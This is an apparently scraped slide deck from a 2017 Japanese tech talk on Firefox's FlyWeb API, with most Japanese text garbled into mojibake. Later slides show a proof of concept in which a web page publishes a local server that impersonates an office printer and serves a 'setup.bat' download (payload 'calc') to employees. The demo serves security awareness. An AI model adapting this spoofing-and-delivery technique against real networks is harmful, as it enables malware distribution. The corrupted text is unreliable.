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RECRUIT Technologies NIGHT vol.3の発表資料です。


February 03, 2017


Other Decks in Technology


  1. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html <h1>Page 1</h1> --BOUNDARY

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  15. 'MZ8FCͷ࢓૊Έ Local Network (1) Launch a website (2) HTML /

    JS (3) Publish mDNS and web servers (4) DNS Service Discovery (5) HTTP & WebSocket +BWB4DSJQUͰαʔόΛ্ཱͪ͛Δ ϩʔΧϧΤϦΞ಺ͷ୺຤͕ͦͷαʔόʹΞΫηε
  16. navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers

    = {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; });
  17. navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers

    = {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; }); .Z4FSWFS@GMZXFC@UDQMPDBMͱ͍͏αʔϏε໊Ͱ N%/4ͱ)551αʔόΛىಈ ϩʔΧϧΤϦΞͷ୺຤͕αʔόʹΞΫηε͖ͯͨ͠Β )FMMP'MZ8FCͱॻ͔Εͨ)5.-Λฦ͢
  18. 'MZ8FCͰձࣾͷωοτϫʔΫʹ৵ೖͰ͖ͦ͏ͩ Local Network (1) Launch a website (2) HTML /

    JS (3) Publish mDNS and web servers (4) Launch HTTP UI (5) Download malware 'MZ8FCͰΦϑΟεϓϦϯλͷ ؅ཧը໘ʹͳΓ͢·͢ ؅ཧը໘ʹΞΫηεͨ͠୺຤ʹ Ϛϧ΢ΣΞ഑෍ ͏͔ͬΓࣾһ͕᠘αΠτΛӾཡ
  19. navigator.publishServer('Can0n ME220').then(server => { server.onfetch = e => { var

    h = {'Content-Type': 'application/bat', 'Content-Disposition': 'attachment; filename=setup.bat'}; var cmd = 'calc'; e.respondWith(new Response(cmd, {headers: h})); }; }); ΦϑΟεϓϦϯλͱಉ͡%/4໊Λࢦఆ ΞΫηεͨ͠୺຤ʹ TFUVQCBU Λ഑෍